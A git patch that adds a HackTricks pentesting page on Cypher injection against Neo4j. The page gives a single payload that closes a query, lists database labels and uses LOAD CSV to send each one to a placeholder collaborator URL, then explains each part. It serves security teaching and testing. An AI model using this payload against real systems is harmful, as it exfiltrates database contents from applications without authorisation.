From ef2f2ed67fd92af4a4051a7cfa5f329fea784adc Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Wed, 21 Dec 2022 11:19:58 +0000
Subject: [PATCH] GitBook: [#3697] No subject

---
 SUMMARY.md                                    |  1 +
 .../sql-injection/cypher-injection-neo4j.md   | 47 +++++++++++++++++++
 2 files changed, 48 insertions(+)
 create mode 100644 pentesting-web/sql-injection/cypher-injection-neo4j.md

diff --git a/SUMMARY.md b/SUMMARY.md
index 959aadfc..c4ac62d8 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -540,6 +540,7 @@
   * [MySQL injection](pentesting-web/sql-injection/mysql-injection/README.md)
     * [MySQL File priv to SSRF/RCE](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
   * [Oracle injection](pentesting-web/sql-injection/oracle-injection.md)
+  * [Cypher Injection (neo4j)](pentesting-web/sql-injection/cypher-injection-neo4j.md)
   * [PostgreSQL injection](pentesting-web/sql-injection/postgresql-injection/README.md)
     * [dblink/lo\_import data exfiltration](pentesting-web/sql-injection/postgresql-injection/dblink-lo\_import-data-exfiltration.md)
     * [PL/pgSQL Password Bruteforce](pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md)
diff --git a/pentesting-web/sql-injection/cypher-injection-neo4j.md b/pentesting-web/sql-injection/cypher-injection-neo4j.md
new file mode 100644
index 00000000..535f360d
--- /dev/null
+++ b/pentesting-web/sql-injection/cypher-injection-neo4j.md
@@ -0,0 +1,47 @@
+# Cypher Injection (neo4j)
+
+<details>
+
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>
+
+## Example
+
+`.*' | o ] AS filteredOrganisations CALL db.labels() YIELD label LOAD CSV FROM 'http://<collaborator-url-here>/' + label AS r //`
+
+> **Explanation of the payload**
+
+`.*' | o ] AS filteredOrganisations`
+
+This whole part was to close the current query partially. The above part partially closed the current query and helped adding new clauses to the original query.
+
+`CALL db.labels() YIELD label`
+
+The CALL clause is used to evaluate a subquery, here the subquery is calling db.labels(), a built-in procedure which returns a list of all labels used in the database. YIELD clause stores the returned list in the variable “label”.
+
+`LOAD CSV FROM 'http://<collaborator-url-here>/' + label AS r //`
+
+LOAD CSV is a clause used to load a csv file from a user defined location via the FROM keyword. Here the LOAD CSV makes a request to our burp collaborator client appending one element of the list “label” at a time. As a result multiple requests were sent to my burp collaborator client and all requests had different label names appended to the requested endpoint. The end part ‘AS r’ was only used because the query was breaking constantly without it, all it does is loads the csv file as “r” and the final two forward slashes ‘//’ were used to comment out the rest of the query in the same line.
+
+## References
+
+* [https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8](https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8)
+
+<details>
+
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>